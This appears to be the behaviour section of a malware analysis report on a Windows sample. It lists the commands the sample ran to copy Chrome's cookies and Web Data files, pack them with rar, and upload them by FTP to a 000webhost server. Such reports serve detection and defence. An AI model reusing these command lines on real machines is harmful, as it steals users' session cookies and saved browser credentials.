Technical Information
File system paths involved:
- %TEMP%\84dd.tmp\84ed.bat
- <SYSTEM32>\rar.exe
- C:\cookies\user\cookies
- C:\cookies\user\web data
- C:\cookies\user\web data-journal
- C:\cookies\user\user.rar
- C:\cookies\user\ftpcmd.dat
Network activity:
- 'fi###.#00webhost.com':21
- DNS ASK fi###.#00webhost.com
Processes launched (command lines):
- '<SYSTEM32>\rar.exe' a user
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\84DD.tmp\84ED.bat <Full path to file>"
- '<SYSTEM32>\xcopy.exe' "%ProgramFiles%\WinRAR\Rar.exe" "<SYSTEM32>"
- '<SYSTEM32>\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Default\cookies" "C:\Cookies\"user
- '<SYSTEM32>\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Web Data" "C:\Cookies\"user
- '<SYSTEM32>\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Web Data-journal" "C:\Cookies\"user
- '<SYSTEM32>\ftp.exe' -n -s:ftpcmd.dat files.000webhost.com
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "<SYSTEM32>\ftp.exe"